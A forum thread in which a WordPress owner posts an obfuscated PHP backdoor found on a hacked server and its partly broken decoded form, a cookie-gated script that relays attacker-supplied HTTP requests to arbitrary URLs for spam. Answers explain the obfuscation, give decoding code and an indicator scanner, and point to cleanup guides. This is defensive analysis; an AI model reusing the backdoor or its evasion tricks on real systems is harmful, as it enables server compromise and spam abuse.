PHP script sending spam mail

I'm running WordPress on my Ubuntu server. Recently I found that it has been hacked and is sending a lot of spam from my server. I found the weird script below in my WordPress directory. Does anyone know what it is doing? And how do I reverse the obfuscation and see the original code?

<?php
 $fodhaow = 2570; function iytpmqplaf($jtsqp, $paicjek){$nuodxnxumv = ''; for($i=0; $i < strlen($jtsqp); $i++){$nuodxnxumv .= isset($paicjek[$jtsqp[$i]]) ? $paicjek[$jtsqp[$i]] : $jtsqp[$i];}
$itbenabk="base" . "64_decode";return $itbenabk($nuodxnxumv);}
$uhzwglv = 'RrqBxzCyDeRfd1aNuGc58eqMDedPlGdydPmm2Q5vAEcNl0qMu1zi2A75l17MD'.
'edPlGdydPmm2Q5vAEcqu9dguqCPDecgu9aNl0ufoAE3pRNhu1zieGaNlwzMlrqXxeRfoAE3pRN'.
'hxw7BlGdqeGzyDedM8wdgu9RfoZE3pRNhxwFNeGvq7AV9lwHne1znDwvI7rqglqCixwIqd'.
'Pmm2Q5vAVi2D0CPDwHLxAhfdHCpQiCbZYYV8eoVdrqiDwiNpRN3pRfVTAhVxw8V2Aa'.
'N7rzXTAUCTAdEDp7EoQumoPiF8QTibQRyvLTX6poFv4IqDwRioQc46pHEvQV42Ri2TAhVTAhVTAcqKrqi2AE3pRNCpRfvA4aE8e'.
'aSTpiVD0q5DzC9DeaM81CB7rzB7tofdGcfupfgb1qButzidPE3pRfEDrHi8ZhCTtvmlrqi2ATCT4mEDrHi8ZmP2Q5vAVi2drT1'.
'vHCEDwvgDrzMDrHi8ZhCTrdSu1Y1vHCEDwvgDrYf7ed5DrzLl1aq2AaE8ea'.
'SwyH72ZE3pRfvA4ayDwFEe1aS7rUVsZcIl9vqu0qSlrqkDZSEDwvPKeci2Aa4vLaMDrzLl1a'.
'qe1aS7rUN2Q5vAVi2dtdquGz57AhCTtvql0aMDrHi8QUV2AayDwFEe1aS7rUN6mi2pRNND4hfTZaPDe'.
'vIltRNpRN3pRfVTAhVdtdquGz57AhCTtvql0aMDrHi8QTfdtvql0aMDrHi8ZE3pRNCpRfvA0zLxrJVd'.
'tdquGz57p5vAVi2D9zB8GaNl1nVDrzLu9qm7AVEDrHi8ZEvA95vA4hV'.
'TAhElGzie1aS7rUVsZh4TL5vA4hVTAhEx1zFTpiVdHCQazdwazdldiSYzHcMZUCQzA77TAnVdHCQazdwazdldIdH'.
'YzzHYIaMzzdddIi3pRfVTAhVdrXqKzC5DwnVsZcy7td5DwnfdrXqKZE3pRfVpRfVTAhVD0CPTAVExQim'.
'6PhExZhJTtviu0Oql4VEx1zF2Q5VdrEW2PEvA4hVTAc3pRfVTAhVTAhVTAaWDeql'.
'drq7TpiV81SP2rCPDAVEx1zFwPaNeZEVe4hfdrXqKzC5DwnVdZhPvQYN2Q5vA4hVTAcCpRfvA4hVTAc0lGTV2AaNs'.
'Qh3TAaNstviu0Oql4VEDrHi8ZE32Ri2TAhVTt5vA4hVTAhVTAhVD0CPTAVExLi'.
'm6PhExLOy7td5DwnfdrXqKZEVd48VdrEJuGaPlrzB2AaE8eaS2Q5VdrfW2PmVdrEW2PE'.
'vA4hVTAhVTAhVKmi2TAhVTAhVTAhVTAhVdrCI7HCE8eaSTAnCTrvfu4Sgu0RfdraS7'.
'rHldrq72ZcKTrCPDAVEx1zFwPajeZEN6mi2TAhVTAhVTAcCpRfVTAhVMRi2pRfVTAhVu0zi7edBTAag7eaMDrHi8Q5vA9ivAV'.
'i2D9zB8GaNl1nVu1zBDHCE8eaSoZVEDrHi8ZEvA95vA4hVTAhExrzSDAhCTAT46m'.
'i2pRfVTAhVD0CPDwHLxAVEDrHi8z54xrzSDrzPuPd7TrHyTAaWDeECs4a18wOIDZEvA4hVTAc'.
'3pRfVTAhVTAhVTAafDwHETAnCTAaWDeEVb4h464h4TAnVdtDSltz'.
'qTAnVTqOPern46mi2TAhVTtivAVi2TAhVTAam8edSleoVsZcSu9dSKZV9xtaiuAuVsQn'.
'V8edP8eEfpRfVTAhVTAhVTA7XDeafl1R9Tpi+TAaE8eaSwPdXDeafl1R4eZmvA4hVTAhVTAhVd1Sq'.
'8waqu4uVsQnVdrSq8wR5pRfVTAhVTAhVTA7Ll1FiDwFidPhCs4hEDrHi8'.
'z5480CEKZd7bhi2TAhVTAhVTAh97rqXDwCI7AuVsQnVdraS7rHlT9aNlwzg7eR4eZmvA4hVTAhVTAhVpRfVTAh'.
'V2ZE3pRfvA4hVTAhE8GanTpiVuGaPDwHXe1vgl9aqKtaM8Gdq8eaq2Aam8edSleoN6mi2TAhVThi2TAh'.
'VTAaPDevIltRVsZchD0q5DzC9DeaM81CB7rzB7tofdraS7rHlT9zPlAd7bAcrRYOQaZmVdrviKAE3pRfvA4hVTAcND4hfdrSi'.
'7tcMu0zyurCBu1zMxrzSDrzP2Ri2TAhVTt5vA4hVTAhVTAhVxw8V2tviu9cguPVExtaiuHCPDevml1FyDzCfDw'.
'HEDedloHi5TATPoph42ZhCsQiVaEHoYiYNpRfVTAhVTAhVTt5vA4hVTAhVTAhVTAhVTAaPDevIltRVsZh4ZHaYYHCHYqdsYqO'.
'iT4hBTAaf7tameGdquGcgl9vqe1Sq8waquq5meQ5vA4hVTAhVTAhVMRi2TAhVTtivA4hVTAcq'.
'ltvqpRfVTAhVKmi2TAhVTAhVTAhEu0zy7wOiTpiVTEvsQEFHRIadQiFMazdZQIT46mi2TAhVTtivAVi2TAhV'.
'Ttdq7tzPl4hEu0zy7wOi6mi2MRi2pRN07wFL7rqgl4cyDwFEe1aS7rUP2AaE8'.
'eaS2Ri2Kmi2TAhVTAJgTtzyDZcyl1vWDeaypRNC';
$tedsroi = Array('1'=>'2', '0'=>'m', '3'=>'7', '2'=>'K', '5'=>'s', '4'=>'i', '7'=>'d', '6'=>'O', '9'=>'n', '8'=>'Y', 'A'=>'C', 'C'=>'9', 'B'=>'u', 'E'=>'k', 'D'=>'Z', 'G'=>'3', 'F'=>'5', 'I'=>'1', 'H'=>'F', 'K'=>'e', 'J'=>'8', 'M'=>'f', 'L'=>'j', 'O'=>'x', 'N'=>'p', 'Q'=>'T', 'P'=>'y', 'S'=>'h', 'R'=>'Q', 'U'=>'E', 'T'=>'I', 'W'=>'r', 'V'=>'g', 'Y'=>'U', 'X'=>'t', 'Z'=>'S', 'a'=>'R', 'c'=>'B', 'b'=>'L', 'e'=>'X', 'd'=>'J', 'g'=>'v', 'f'=>'o', 'i'=>'0', 'h'=>'A', 'k'=>'6', 'j'=>'q', 'm'=>'w', 'l'=>'b', 'o'=>'M', 'n'=>'4', 'q'=>'l', 'p'=>'D', 's'=>'P', 'r'=>'G', 'u'=>'c', 't'=>'H', 'w'=>'W', 'v'=>'N', 'y'=>'z', 'x'=>'a', 'z'=>'V');
eval/*o*/(iytpmqplaf($uhzwglv, $tedsroi));?>

I finally got the decoded script, shown below. But one line has a syntax error, and there is a function "send_data1" which has not been defined. I wonder how this script works.

@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time', 0);

foreach ($_COOKIE as $item) {
    if ($item != "dd7d1703-9a24-4362-8396-eed410b81d58")
        exit();
}

$data = file_get_contents('php://input');
$data = split("=", $data, 2);
$b64_decode_data = base64_decode(urldecode($data[1]));
$send_data = unserialize(decrypt($b64_decode_data));

$result = send_data1($send_data);

if (!$result) {
    $result = send_data2($send_data);
}

echo $result;

function decrypt($data) {
    $out_data = "";
    $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $key_len = strlen($key);
    for ($i = 0; $i < strlen($key); $i++) {
        $key[$i] = chr(ord($key[$i]) ^ ($key_len % 255));
    }

    for ($i = 0; $i$value;) { // this line has error
        $head .= $key . ": " . $value . "\r\n";
    }

    $params = array(
        'http' => array(
            'method' => $data["method"],
            'header' => $head,
            'content' => $data["body"],
            'timeout' => $data["timeout"],
        )
    );

    $ctx = stream_context_create($params);
    $result = @file_get_contents($data["url"], FALSE, $ctx);
    if ($http_response_header) {
        if (strpos($http_response_header[0], "200") === FALSE) {
            $result = "HTTP_ERROR\t" . $http_response_header[0];
        }
    } else {
        $result = "CONNECTION_ERROR";
    } return $result;
}

function send_data2($data) {

}

The good old script-kiddie base64 stuff.

What happens is the following:

First of all, there is an eval() which evaluates a string as PHP code. To avoid the string eval( being found within your code base, a /*o*/ comment was put in. The function iytpmqplaf() provides the PHP code to be executed.

Secondly, there is this variable $itbenabk which contains "base64_decode". Again, to avoid the string base64_decode being found within the code base, the string was concatenated from two strings.

Thirdly, the $itbenabk variable gets invoked. PHP realizes that $itbenabk contains the string name of an existing function, namely base64_decode(), and thus invokes it. The string in $uhzwglv contains the actual PHP code.

The actual base64 string was also modified a bit by a simple char-to-char map. To see the actual code, you can do:

// $uhzwglv is the long encoded string from the obfuscated script; $char2char is its $tedsroi table
$char2char = Array('1'=>'2', '0'=>'m', '3'=>'7', '2'=>'K', '5'=>'s', '4'=>'i', '7'=>'d', '6'=>'O', '9'=>'n', '8'=>'Y', 'A'=>'C', 'C'=>'9', 'B'=>'u', 'E'=>'k', 'D'=>'Z', 'G'=>'3', 'F'=>'5', 'I'=>'1', 'H'=>'F', 'K'=>'e', 'J'=>'8', 'M'=>'f', 'L'=>'j', 'O'=>'x', 'N'=>'p', 'Q'=>'T', 'P'=>'y', 'S'=>'h', 'R'=>'Q', 'U'=>'E', 'T'=>'I', 'W'=>'r', 'V'=>'g', 'Y'=>'U', 'X'=>'t', 'Z'=>'S', 'a'=>'R', 'c'=>'B', 'b'=>'L', 'e'=>'X', 'd'=>'J', 'g'=>'v', 'f'=>'o', 'i'=>'0', 'h'=>'A', 'k'=>'6', 'j'=>'q', 'm'=>'w', 'l'=>'b', 'o'=>'M', 'n'=>'4', 'q'=>'l', 'p'=>'D', 's'=>'P', 'r'=>'G', 'u'=>'c', 't'=>'H', 'w'=>'W', 'v'=>'N', 'y'=>'z', 'x'=>'a', 'z'=>'V');
$b64code = '';
for ($i = 0; $i < strlen($uhzwglv); $i++) {
    // characters not in the map ('+', '/', '=') pass through unchanged
    $b64code .= isset($char2char[$uhzwglv[$i]])
                   ? $char2char[$uhzwglv[$i]] : $uhzwglv[$i];
}
echo base64_decode($b64code);
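As an added example (my own code, not the answer's snippet and not anything from the question's script), here is the same reversal done offline in Python, plus a small indicator scan that goes a step beyond the answer. The substitution table is copied from $tedsroi in the question and unmap_and_decode() mirrors iytpmqplaf(); the encoder, the indicator list and the three PHP snippets it is run over are constructed for this demonstration. The scan flags the tricks the answer describes (eval hidden behind a comment, a function name split across concatenated strings, a variable function call) together with traits of the decoded relay script in the question (reading php://input, error silencing, ignore_user_abort), so the same checks can be run over a WordPress tree while cleaning up.

```python
import base64
import re

# Substitution table copied from $tedsroi in the obfuscated script in the question.
# It is a bijection on [0-9A-Za-z]; '+', '/' and '=' are absent and pass through,
# which is what the isset() fallback in iytpmqplaf() is for.
CHAR_MAP = {
    '1': '2', '0': 'm', '3': '7', '2': 'K', '5': 's', '4': 'i', '7': 'd', '6': 'O',
    '9': 'n', '8': 'Y', 'A': 'C', 'C': '9', 'B': 'u', 'E': 'k', 'D': 'Z', 'G': '3',
    'F': '5', 'I': '1', 'H': 'F', 'K': 'e', 'J': '8', 'M': 'f', 'L': 'j', 'O': 'x',
    'N': 'p', 'Q': 'T', 'P': 'y', 'S': 'h', 'R': 'Q', 'U': 'E', 'T': 'I', 'W': 'r',
    'V': 'g', 'Y': 'U', 'X': 't', 'Z': 'S', 'a': 'R', 'c': 'B', 'b': 'L', 'e': 'X',
    'd': 'J', 'g': 'v', 'f': 'o', 'i': '0', 'h': 'A', 'k': '6', 'j': 'q', 'm': 'w',
    'l': 'b', 'o': 'M', 'n': '4', 'q': 'l', 'p': 'D', 's': 'P', 'r': 'G', 'u': 'c',
    't': 'H', 'w': 'W', 'v': 'N', 'y': 'z', 'x': 'a', 'z': 'V',
}
# Inverse table, constructed here only so a sample can be encoded for the round trip.
INVERSE_MAP = {v: k for k, v in CHAR_MAP.items()}


def unmap_and_decode(blob: str, table: dict = CHAR_MAP) -> bytes:
    """Mirror of iytpmqplaf(): map each character through the table (unknown
    characters pass through), then base64-decode the result."""
    b64 = "".join(table.get(ch, ch) for ch in blob)
    return base64.b64decode(b64)


def map_and_encode(payload: bytes, table: dict = INVERSE_MAP) -> str:
    """Encoding side (not on the page; constructed to produce test input)."""
    b64 = base64.b64encode(payload).decode("ascii")
    return "".join(table.get(ch, ch) for ch in b64)


# Indicator patterns drawn from the two scripts in the question.
INDICATORS = {
    "eval_hidden_by_comment": re.compile(r"\beval\s*/\*.*?\*/\s*\("),
    "variable_function_call": re.compile(r"\$\w+\s*\(\s*\$\w+"),
    "split_function_name": re.compile(r"['\"]\w+['\"]\s*\.\s*['\"]\w+['\"]"),
    "raw_request_body": re.compile(r"php://input"),
    "error_silencing": re.compile(
        r"@?(?:error_reporting\(\s*0\s*\)|"
        r"ini_set\(\s*['\"](?:display_errors|log_errors)['\"]\s*,\s*0\s*\))"),
    "detach_from_client": re.compile(r"ignore_user_abort\(\s*1\s*\)"),
}


def normalize_concat(src: str) -> str:
    """Join adjacent string literals ("base" . "64_decode" -> "base64_decode")
    so a function name hidden by concatenation becomes greppable."""
    return re.sub(r"(['\"])\s*\.\s*\1", "", src)


def scan_php(src: str) -> list:
    """Return the sorted list of indicator names found in one PHP source text."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    plain = re.search(r"\bbase64_decode\b", src)
    hidden = re.search(r"\bbase64_decode\b", normalize_concat(src))
    if hidden and not plain:
        hits.append("concatenated_base64_decode")
    return sorted(hits)


# Constructed PHP snippets modelled on the question, not copied from it.
DROPPER_SAMPLE = r'''<?php
$fn = "base" . "64_decode";
function dec($s, $m) { global $fn; return $fn($s); }
eval/*o*/(dec($blob, $map));
'''
RELAY_SAMPLE = r'''<?php
@ini_set('display_errors', 0);
@error_reporting(0);
@ignore_user_abort(1);
$data = file_get_contents('php://input');
'''
CLEAN_SAMPLE = r'''<?php
$id = base64_decode($_GET["id"]);
echo htmlspecialchars($id);
'''

if __name__ == "__main__":
    blob = map_and_encode(b'echo "constructed sample";')
    print("encoded:", blob)
    print("decoded:", unmap_and_decode(blob).decode())
    for name, src in (("dropper", DROPPER_SAMPLE), ("relay", RELAY_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, scan_php(src))
```

To use it on the real file, paste the value of $uhzwglv into unmap_and_decode() instead of the constructed sample; the concatenation check in scan_php() is what keeps a plain grep for base64_decode from missing the "base" . "64_decode" trick the answer points out.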

You can unobfuscate the code, but it doesn't really matter. You should be more concerned with finding and closing the security issue.

The best thing to do is to carefully follow FAQ My site was hacked - WordPress Codex.

Then take a look at the recommended security measures in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex.
